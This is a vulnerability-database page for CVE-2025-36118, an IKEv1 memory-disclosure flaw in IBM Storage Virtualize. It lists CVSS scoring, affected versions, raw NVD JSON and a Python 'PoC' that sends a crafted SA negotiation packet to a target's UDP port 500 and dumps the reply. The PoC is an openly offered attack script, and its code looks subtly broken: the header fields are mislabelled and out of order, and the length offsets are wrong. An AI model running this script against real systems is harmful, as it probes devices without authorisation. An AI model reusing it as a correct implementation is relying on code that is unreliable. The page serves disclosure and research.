Security Vulnerability Report
中文
CVE-2025-36118 CVSS 7.5 HIGH

CVE-2025-36118

Published: 2025-11-17 21:15:57
Last Modified: 2025-12-08 15:14:18
Source: [email protected]

Description

IBM Storage Virtualize 8.4, 8.5, 8.7, and 9.1 IKEv1 implementation allows remote attackers to obtain sensitive information from device memory via a Security Association (SA) negotiation request.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:storage_virtualize:8.4.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:storage_virtualize:8.5.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:storage_virtualize:8.7.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:storage_virtualize:9.1.0.0:*:*:*:*:*:*:* - VULNERABLE
IBM Storage Virtualize 8.4
IBM Storage Virtualize 8.5
IBM Storage Virtualize 8.7
IBM Storage Virtualize 9.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-36118 PoC - IBM Storage Virtualize IKEv1 Information Disclosure # This PoC demonstrates sending a malformed IKEv1 SA negotiation request import socket import struct import random def build_ike_header(isakmp_spi, exchange_type, flags=0x08): """Build IKEv1 header""" header = bytearray() # ISAKMP Header Format (20 bytes) header.extend(isakmp_spi) # Initiator SPI (8 bytes) header.extend(bytes(8)) # Responder SPI (8 bytes) - zeroed header.extend(struct.pack('>B', exchange_type)) # Next Payload (0x00) header.extend(struct.pack('>B', 0x10)) # Version (1.0) header.extend(struct.pack('>B', flags)) # Exchange Type Flags header.extend(struct.pack('>I', 0)) # Message ID header.extend(struct.pack('>I', 0)) # Length (to be filled) return bytes(header) def build_sa_proposal(payload_type=1): """Build SA Proposal payload with crafted values""" payload = bytearray() payload.extend(struct.pack('>B', payload_type)) # Next Payload (0x00 for last) payload.extend(struct.pack('>B', 0)) # Reserved payload.extend(struct.pack('>H', 28)) # Payload Length payload.extend(struct.pack('>B', 1)) # Proposal #1 payload.extend(struct.pack('>B', 1)) # Protocol ID (IKE) payload.extend(struct.pack('>B', 4)) # SPI Size payload.extend(struct.pack('>B', 0)) # # of transforms payload.extend(bytes(4)) # SPI (4 bytes) return bytes(payload) def send_ike_exploit(target_ip, target_port=500): """Send malicious IKEv1 SA negotiation request""" sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(10) # Generate random Initiator SPI isakmp_spi = bytes([random.randint(0, 255) for _ in range(8)]) # Build IKEv1 message with SA proposal ike_header = build_ike_header(isakmp_spi, exchange_type=0x02) # Main Mode sa_payload = build_sa_proposal() ike_packet = ike_header + sa_payload # Fix length field ike_packet = ike_packet[:24] + struct.pack('>I', len(ike_packet)) + ike_packet[28:] print(f"[*] Sending malformed IKEv1 SA negotiation to {target_ip}:{target_port}") print(f"[*] SPI: {isakmp_spi.hex()}") print(f"[*] Packet length: {len(ike_packet)} bytes") try: sock.sendto(ike_packet, (target_ip, target_port)) response, addr = sock.recvfrom(4096) print(f"[+] Received response ({len(response)} bytes)") print(f"[*] Response hex: {response.hex()}") return response except socket.timeout: print("[-] No response received (target may not be vulnerable or IKE disabled)") return None except Exception as e: print(f"[-] Error: {e}") return None finally: sock.close() if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python cve_2025_36118_poc.py <target_ip>") sys.exit(1) target_ip = sys.argv[1] send_ike_exploit(target_ip)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36118", "sourceIdentifier": "[email protected]", "published": "2025-11-17T21:15:57.450", "lastModified": "2025-12-08T15:14:18.287", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Storage Virtualize 8.4, 8.5, 8.7, and 9.1 IKEv1 implementation allows remote attackers to obtain sensitive information from device memory via a Security Association (SA) negotiation request."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-244"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:storage_virtualize:8.4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "CCD76474-4EBF-4C69-8303-881628CD0BB6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:storage_virtualize:8.5.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B854C19F-9932-4A29-BA06-AD7524276FF9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:storage_virtualize:8.7.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "07AFA9D0-99F4-4C1C-8719-55C2B2C96AE7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:storage_virtualize:9.1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "2181F15C-0152-40A5-8B45-E417C6D4EFE4"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7250954", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.